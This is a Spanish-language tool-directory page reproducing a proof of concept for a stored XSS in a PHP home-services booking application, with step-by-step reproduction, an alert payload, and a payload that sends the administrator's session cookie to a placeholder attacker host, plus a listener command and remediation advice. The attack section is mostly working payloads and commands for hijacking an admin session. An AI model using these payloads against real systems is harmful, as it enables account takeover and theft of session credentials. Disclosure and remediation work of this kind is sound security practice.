Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-7089-XSS — Prueba de concepto para CVE-2026-7089, un XSS almacenado en Home Service System PHP 1.0 que permite el secuestro de sesión de administrador sin autenticación a través del formulario de reservas. | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-7089-xss
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

Prueba de concepto para CVE-2026-7089, un XSS almacenado en Home Service System PHP 1.0 que permite el secuestro de sesión de administrador sin autenticación a través del formulario de reservas.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

home-service-system-unauth-stored-xss-admin-takeover

Detalles de la Vulnerabilidad

CampoDetalles
Vendedorcode-projects.org
ProductoHome Service System In PHP
Versión1.0
Tipo de VulnerabilidadCross-Site Scripting Almacenado (XSS)
CWECWE-79
Autenticación RequeridaNo
AutorImad Alvi

Descripción

Existe una vulnerabilidad de Cross-Site Scripting Almacenado (XSS) en el archivo booking.php de Home Service System In PHP 1.0. Los usuarios no autenticados pueden inyectar payloads maliciosos de JavaScript a través de los campos del formulario de reserva. La entrada no saneada se almacena en la base de datos y se renderiza sin codificación de salida en el panel de administración (admin.php), donde se ejecuta en el contexto del navegador del administrador.

Esto permite a un atacante no autenticado robar la cookie de sesión del administrador, realizar acciones en nombre del administrador o comprometer completamente la cuenta de administrador.


Componente Afectado

  • Archivo: booking.php
  • Parámetros: fname, lname
  • Sumidero: admin.php → Gestionar Reservas

Pasos para Reproducir

  1. Navegue a la página de reservas como usuario no autenticado: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. En el campo Nombre, inyecte el siguiente payload:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. Complete los campos restantes con datos válidos y envíe la reserva.

  2. Inicie un listener en su máquina atacante:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. Espere a que el administrador visite la sección Gestionar Reservas en admin.php.

  2. El payload se ejecuta en el navegador del administrador, exfiltrando la cookie de sesión a su listener.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

Prueba de Concepto

Payload (Alerta)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

Payload (Secuestro de Sesión)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

Impacto

Esta vulnerabilidad permite a un atacante remoto no autenticado comprometer completamente la aplicación.

Un atacante puede:

  • Ejecutar JavaScript arbitrario en el navegador del administrador
  • Robar la cookie de sesión PHPSESSID del administrador
  • Secuestrar la sesión del administrador y obtener acceso administrativo completo
  • Realizar cualquier acción administrativa (gestionar reservas, proveedores, etc.)

Esto resulta en el compromiso completo de la aplicación.

Remediación

  • Aplique htmlspecialchars() con ENT_QUOTES en toda entrada proporcionada por el usuario antes de almacenarla o renderizarla
  • Implemente una cabecera de Política de Seguridad de Contenido (CSP)
  • Valide y sanece todas las entradas de formularios en el lado del servidor

Referencias

  • Home Service System In PHP - code-projects.org
Descargar herramienta